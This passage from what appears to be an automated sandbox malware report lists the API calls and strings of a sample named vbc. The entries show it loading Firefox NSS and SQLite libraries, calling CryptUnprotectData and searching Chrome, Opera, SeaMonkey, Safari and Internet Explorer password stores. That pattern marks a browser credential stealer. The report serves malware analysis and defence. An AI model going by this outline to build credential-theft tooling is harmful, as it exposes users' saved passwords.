                                                              • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 00441B0C
                                                              • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 00441B19
                                                              • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 00441B26
                                                              • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 00441B33
                                                              • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 00441B40
                                                              • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00441B4D
                                                              • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 00441B5A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoadwcscpy$wcscat$memset$HandleModule
                                                              • String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$mozsqlite3.dll$nss3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                              • API String ID: 2522319644-522817110
                                                              • Opcode ID: 8848e67c20b1512477d94237df3342a95449e5598eedc60463cf29981b84716b
                                                              • Instruction ID: 320c17c5e6ace6947bedab1e2bf77c9c6d077df099d9b5840aba930edb5fc244
                                                              • Opcode Fuzzy Hash: 8848e67c20b1512477d94237df3342a95449e5598eedc60463cf29981b84716b
                                                              • Instruction Fuzzy Hash: 855165B1901709BADB20FFB18D49A4BB7F8AF08704F5008ABE54AE2551E778E644CF18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111B6
                                                              • memset.MSVCRT ref: 004111CB
                                                              • Process32FirstW.KERNEL32(?,?), ref: 004111E7
                                                              • OpenProcess.KERNEL32(00000410,00000000,?,00001000,?,00000000), ref: 0041122C
                                                              • memset.MSVCRT ref: 00411253
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00411288
                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 004112A2
                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 004112F4
                                                              • free.MSVCRT(?), ref: 0041130D
                                                              • Process32NextW.KERNEL32(?,0000022C), ref: 00411356
                                                              • CloseHandle.KERNEL32(?,?,0000022C), ref: 00411366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                              • API String ID: 1344430650-1740548384
                                                              • Opcode ID: a581b19634e19e8035e4122d57eadaf68f33b1a2eeb6ea210ae6cfe6b9de148a
                                                              • Instruction ID: bbba850b15206e26884db202d857e323fd936e243bbe251c85cc099381913945
                                                              • Opcode Fuzzy Hash: a581b19634e19e8035e4122d57eadaf68f33b1a2eeb6ea210ae6cfe6b9de148a
                                                              • Instruction Fuzzy Hash: 7E51AF72840258ABDB21DF55CC84EDEB7B9EF94304F1001ABFA18E3261DB759A84CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                              • String ID:
                                                              • API String ID: 4218492932-0
                                                              • Opcode ID: 91481d4031c4b0f89b54af3f497fb88c2307565dbaae607565dd24303698038d
                                                              • Instruction ID: b821822af8fa1f08beba458ee4fa97db6355aebb6f9a48b4278dc6bbcb45c8c8
                                                              • Opcode Fuzzy Hash: 91481d4031c4b0f89b54af3f497fb88c2307565dbaae607565dd24303698038d
                                                              • Instruction Fuzzy Hash: 601163F3900118ABDB00EFA4DC899DAB7ACEF19710F454536FA09DB144E674E748C7A9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 00415B06
                                                                • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00415B2D
                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00415B56
                                                              • LocalFree.KERNEL32(?), ref: 00415B71
                                                              • free.MSVCRT(?,0044A338,?), ref: 00415B9F
                                                                • Part of subcall function 00414C63: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74B05970,?,00414D8E,?), ref: 00414C81
                                                                • Part of subcall function 00414C63: malloc.MSVCRT ref: 00414C88
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                              • String ID: OsError 0x%x (%u)
                                                              • API String ID: 2360000266-2664311388
                                                              • Opcode ID: c1ee2de0d62a145681142db526d5509333a988fb49754b2fb2235a672af9b3d5
                                                              • Instruction ID: b695a5953d892c14765524e538430075cec87daac3f875befcc4cde39e80dde6
                                                              • Opcode Fuzzy Hash: c1ee2de0d62a145681142db526d5509333a988fb49754b2fb2235a672af9b3d5
                                                              • Instruction Fuzzy Hash: 5F118E34A00218BBDB21AFA19C49CDFBF78EF85B51B104067F405A2250D6795B809BA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,nss3.dll,00000000), ref: 00407E26
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00407E45
                                                              • FindClose.KERNEL32(00000000), ref: 00407E65
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID: .$ld@$nss3.dll
                                                              • API String ID: 3541575487-3654816495
                                                              • Opcode ID: cc7230da910be55964706480e184fd4a449cc4274279a5797c2cb2fba6568da8
                                                              • Instruction ID: 78963b1eb2bf7b5f8aa15039180698213c9a680973a94e339c68aae197af375e
                                                              • Opcode Fuzzy Hash: cc7230da910be55964706480e184fd4a449cc4274279a5797c2cb2fba6568da8
                                                              • Instruction Fuzzy Hash: CEF0BB75901528ABDB206BB4DC8C9ABB7ACEB45765F0401B2ED06E3180D334AE458AD9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                              • API String ID: 2574300362-880857682
                                                              • Opcode ID: 881f98a91457903b94e991739f1253563cd1b946a507866072d03daf316dbad8
                                                              • Instruction ID: 4b50289c71ca44835333f785f02b611be4b8370b72da6f54bb0e40a9521e89f3
                                                              • Opcode Fuzzy Hash: 881f98a91457903b94e991739f1253563cd1b946a507866072d03daf316dbad8
                                                              • Instruction Fuzzy Hash: 86D0C774600313BADB108F209D48B4239746712743F251036F430D1771DF7895C49A1C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000103,0000038B,00000000,?,00410790,?), ref: 00408457
                                                              • FindNextFileW.KERNEL32(000000FF,0000038B,00000000,?,00410790,?), ref: 00408475
                                                              • wcslen.MSVCRT ref: 004084A5
                                                              • wcslen.MSVCRT ref: 004084AD
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileFindwcslen$FirstNext
                                                              • String ID:
                                                              • API String ID: 2163959949-0
                                                              • Opcode ID: 80c24c4a0fd4be1e088faab584ff479ea008bcf4405b994ad439e2c2ad98ac31
                                                              • Instruction ID: 6e3c8222864954d55df90d51b8e56744ea09e2897b7152e8bd6019cb1af30d80
                                                              • Opcode Fuzzy Hash: 80c24c4a0fd4be1e088faab584ff479ea008bcf4405b994ad439e2c2ad98ac31
                                                              • Instruction Fuzzy Hash: E5118272515706AFD7149B24D984A9B73DCAF04725F604A3FF09AD31C0FF78A9448B29
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindResourceW.KERNEL32(?,?,?), ref: 00411F05
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00411F16
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00411F26
                                                              • LockResource.KERNEL32(00000000), ref: 00411F31
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: adc4f220f09edc5477cff5d460e3159a0013e7b06a0f572b2b282906cd572301
                                                              • Instruction ID: cfb809c5d0a350ba8a2f28afb84d758f7034e38599ab5d81eab5ea4ee58a4c6c
                                                              • Opcode Fuzzy Hash: adc4f220f09edc5477cff5d460e3159a0013e7b06a0f572b2b282906cd572301
                                                              • Instruction Fuzzy Hash: 140192367042156BCB295FA5DC4999BBFAEFF867917088036F909C7331DB30D941C688
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00415EAF: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415EDB
                                                                • Part of subcall function 00415EAF: malloc.MSVCRT ref: 00415EE6
                                                                • Part of subcall function 00415EAF: free.MSVCRT(?), ref: 00415EF6
                                                                • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
                                                              • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00416001
                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00416029
                                                              • free.MSVCRT(00000000,?,00000000,?,00000000), ref: 00416032
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                              • String ID:
                                                              • API String ID: 1355100292-0
                                                              • Opcode ID: e0913f6850c8679842100ee3bbfddb78ff949c94f33f97f70eae67f06403cb78
                                                              • Instruction ID: 7d405d749a0edc351a3ddf496a078fe72cac754ac47b8191c628d3d1323914f3
                                                              • Opcode Fuzzy Hash: e0913f6850c8679842100ee3bbfddb78ff949c94f33f97f70eae67f06403cb78
                                                              • Instruction Fuzzy Hash: 45219276804108EEEB21EBA4C8849EF7BBCEF09304F1100ABE641D7141E778CEC597A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
                                                                • Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
                                                                • Part of subcall function 004074C6: GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00407506
                                                              • OpenClipboard.USER32(?), ref: 0040D6B0
                                                              • GetLastError.KERNEL32 ref: 0040D6C9
                                                              • DeleteFileW.KERNEL32(?), ref: 0040D6E8
                                                                • Part of subcall function 00407363: EmptyClipboard.USER32 ref: 0040736D
                                                                • Part of subcall function 00407363: GetFileSize.KERNEL32(00000000,00000000), ref: 0040738A
                                                                • Part of subcall function 00407363: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040739B
                                                                • Part of subcall function 00407363: GlobalLock.KERNEL32 ref: 004073A8
                                                                • Part of subcall function 00407363: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004073BB
                                                                • Part of subcall function 00407363: GlobalUnlock.KERNEL32(00000000), ref: 004073CD
                                                                • Part of subcall function 00407363: SetClipboardData.USER32 ref: 004073D6
                                                                • Part of subcall function 00407363: CloseHandle.KERNEL32(?), ref: 004073EA
                                                                • Part of subcall function 00407363: CloseClipboard.USER32 ref: 004073FE
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                              • String ID:
                                                              • API String ID: 2633007058-0
                                                              • Opcode ID: 892bfac1ef1963b2894920ffb08dc1c3419521efeb45fa25f451c514730559f5
                                                              • Instruction ID: bc74c52ab6c87c34bb6cce86e30c95d4cd513021a264dd7f219e40d67a453ac4
                                                              • Opcode Fuzzy Hash: 892bfac1ef1963b2894920ffb08dc1c3419521efeb45fa25f451c514730559f5
                                                              • Instruction Fuzzy Hash: 45F0C831B0030457EB646B71DC4EFAF376DAB40B01F00057AF469A51E2EFBAF9458A59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 004161BB
                                                              • GetSystemInfo.KERNEL32(00451CE0,?,00000000,00440C34,00000000,?,?,00000003,00000000,00000000), ref: 004161C4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoSystemmemset
                                                              • String ID:
                                                              • API String ID: 3558857096-0
                                                              • Opcode ID: dd8243073eec608bbbd79630c49adaebff64efa1e46b45fbd1c493d48dcf0544
                                                              • Instruction ID: 01e0680712ac90f889d23e176cd2934d89dbbab4f1fad96818c53916f6f4ffc6
                                                              • Opcode Fuzzy Hash: dd8243073eec608bbbd79630c49adaebff64efa1e46b45fbd1c493d48dcf0544
                                                              • Instruction Fuzzy Hash: D6E02230A0062067E3217732BE07FCF22848F02348F00403BFA00DA366F6AC881506ED
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetVersionExW.KERNEL32(00450DA8,0000001A,00412291), ref: 0040768E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: b36f1e02b416ec865f4d87fb5f88c2c9fdef71dbbf2c75f0f10f81923867f6e4
                                                              • Instruction ID: 443b7a688d421a19dce43b17e8414db768b780ab8005fe7e93b00bb89c3c7b35
                                                              • Opcode Fuzzy Hash: b36f1e02b416ec865f4d87fb5f88c2c9fdef71dbbf2c75f0f10f81923867f6e4
                                                              • Instruction Fuzzy Hash: 76C0803C5002205FD7C04B88BC047C375B85B86727F004073ED40A1251C378680CCF9C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 00402201
                                                              • _wcsicmp.MSVCRT ref: 00402231
                                                              • _wcsicmp.MSVCRT ref: 0040225E
                                                              • _wcsicmp.MSVCRT ref: 0040228B
                                                                • Part of subcall function 0040805C: wcslen.MSVCRT ref: 0040806F
                                                                • Part of subcall function 0040805C: memcpy.MSVCRT ref: 0040808E
                                                              • memset.MSVCRT ref: 0040262F
                                                              • memcpy.MSVCRT ref: 00402664
                                                                • Part of subcall function 00403853: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
                                                                • Part of subcall function 00403853: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
                                                                • Part of subcall function 00403853: FreeLibrary.KERNEL32(00000000), ref: 00403897
                                                              • memcpy.MSVCRT ref: 004026C0
                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,00000090,00000000,?), ref: 0040271E
                                                              • FreeLibrary.KERNEL32(00000000,?,00000090,00000000,?), ref: 0040272D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcsicmp$FreeLibrarymemcpy$AddressLoadLocalProcmemsetwcslen
                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                              • API String ID: 462158748-1134094380
                                                              • Opcode ID: 67cf4eee38665e4ec1be56c90270dd44ce6e0e009cbb4a5b7d9f17bd5b1e0b61
                                                              • Instruction ID: cc44404655acc20b5533cc0c34fbbab0c7f11d0fd0cfcd5d05bb593c6a12ed59
                                                              • Opcode Fuzzy Hash: 67cf4eee38665e4ec1be56c90270dd44ce6e0e009cbb4a5b7d9f17bd5b1e0b61
                                                              • Instruction Fuzzy Hash: C9F1FF208087E9C9DB32D7788D097CEBE645B23324F0443D9E1E87A2D2D7B55B85CB66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                              • String ID: :stringdata$dpapi:$ftp://$http://$https://$internet explorer$wininetcachecredentials
                                                              • API String ID: 2787044678-1843504584
                                                              • Opcode ID: cb6674861b630e023730bc8514c911496a266ea8c7e3a43a84e29182814d6b93
                                                              • Instruction ID: bbe16b9e6473d86cc6eed57c0ed50d6d6787e5e5d2f3b2995f82d19aea11410f
                                                              • Opcode Fuzzy Hash: cb6674861b630e023730bc8514c911496a266ea8c7e3a43a84e29182814d6b93
                                                              • Instruction Fuzzy Hash: 2891A571940209BFEF20EF55CD41EDF77A8AF54314F10006AF848A3292EB79EE508B68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 004101DA
                                                              • wcsrchr.MSVCRT ref: 004101F2
                                                              • memset.MSVCRT ref: 004102D9
                                                              • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,00000000,00000104), ref: 00410326
                                                                • Part of subcall function 00409A34: _wcslwr.MSVCRT ref: 00409AFC
                                                                • Part of subcall function 00409A34: wcslen.MSVCRT ref: 00409B11
                                                                • Part of subcall function 00408619: wcslen.MSVCRT ref: 00408678
                                                                • Part of subcall function 00408619: wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
                                                                • Part of subcall function 00408619: memset.MSVCRT ref: 00408725
                                                                • Part of subcall function 00408619: memcpy.MSVCRT ref: 00408746
                                                                • Part of subcall function 00409EB8: LoadLibraryW.KERNEL32(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
                                                                • Part of subcall function 00409EB8: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
                                                                • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F309
                                                                • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F31E
                                                                • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F333
                                                                • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F348
                                                                • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F35D
                                                                • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F383
                                                                • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F394
                                                                • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3CC
                                                                • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3DA
                                                                • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F413
                                                                • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F421
                                                              • memset.MSVCRT ref: 004103AA
                                                              • memset.MSVCRT ref: 004103C6
                                                              • memset.MSVCRT ref: 004103E2
                                                              • memset.MSVCRT ref: 004104F9
                                                                • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E17
                                                                • Part of subcall function 00406DD9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
                                                                • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E69
                                                                • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E81
                                                                • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E99
                                                                • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406EB1
                                                                • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EBC
                                                                • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406ECA
                                                                • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EF9
                                                                • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406F07
                                                              • wcslen.MSVCRT ref: 00410437
                                                              • wcslen.MSVCRT ref: 00410446
                                                              • wcslen.MSVCRT ref: 0041048B
                                                              • wcslen.MSVCRT ref: 0041049A
                                                              • memset.MSVCRT ref: 00410562
                                                              • memset.MSVCRT ref: 0041057A
                                                              • wcslen.MSVCRT ref: 00410593
                                                              • wcslen.MSVCRT ref: 004105A1
                                                              • wcslen.MSVCRT ref: 004105FC
                                                              • wcslen.MSVCRT ref: 0041060A
                                                              • memset.MSVCRT ref: 0041068A
                                                              • wcslen.MSVCRT ref: 00410699
                                                              • wcslen.MSVCRT ref: 00410720
                                                              • wcslen.MSVCRT ref: 0041072E
                                                              • wcslen.MSVCRT ref: 004106A7
                                                                • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083BC
                                                                • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcslen$memset$wcscmp$AddressByteCharEnvironmentExpandLibraryLoadMultiProcStringsWide_wcslwrmemcpywcscatwcscpywcsncmpwcsrchr
                                                              • String ID: %programfiles%\Sea Monkey$Google\Chrome SxS\User Data$Google\Chrome\User Data$Opera$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$wand.dat
                                                              • API String ID: 3317053618-109336846
                                                              • Opcode ID: 29f11a3ee944381f93adb0c3325795c9371be5fcd4d48005fbe8de4b2c3fd2d2
                                                              • Instruction ID: 5236af18994b30efd903e1d9b734594bd5ee8d83944705dbeea0fe3cf72f0f99
                                                              • Opcode Fuzzy Hash: 29f11a3ee944381f93adb0c3325795c9371be5fcd4d48005fbe8de4b2c3fd2d2
                                                              • Instruction Fuzzy Hash: A0F17771901218ABDB20EB51DD85ADEB378AF04714F5444ABF508A7181E7B8AFC4CF9E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetDlgItem.USER32 ref: 00411421
                                                              • GetDlgItem.USER32 ref: 0041142D
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041143C
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00411448
                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00411451
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041145D
                                                              • GetWindowRect.USER32 ref: 0041146F
                                                              • GetWindowRect.USER32 ref: 0041147A
                                                              • MapWindowPoints.USER32 ref: 0041148E
                                                              • MapWindowPoints.USER32 ref: 0041149C
                                                              • GetDC.USER32 ref: 004114D5
                                                              • wcslen.MSVCRT ref: 00411515
                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00411526
                                                              • ReleaseDC.USER32 ref: 00411573
                                                              • _snwprintf.MSVCRT ref: 00411636
                                                              • SetWindowTextW.USER32(?,?), ref: 0041164A
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00411668
                                                              • GetDlgItem.USER32 ref: 0041169E
                                                              • GetWindowRect.USER32 ref: 004116AE
                                                              • MapWindowPoints.USER32 ref: 004116BC
                                                              • GetClientRect.USER32 ref: 004116D3
                                                              • GetWindowRect.USER32 ref: 004116DD
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00411723
                                                              • GetClientRect.USER32 ref: 0041172D
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00411765
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 2080319088-3046471546
                                                              • Opcode ID: 82769fcda4aee539b94f7460eafa85e4f9ca3f83dedf5f01e4882f05d4beebf3
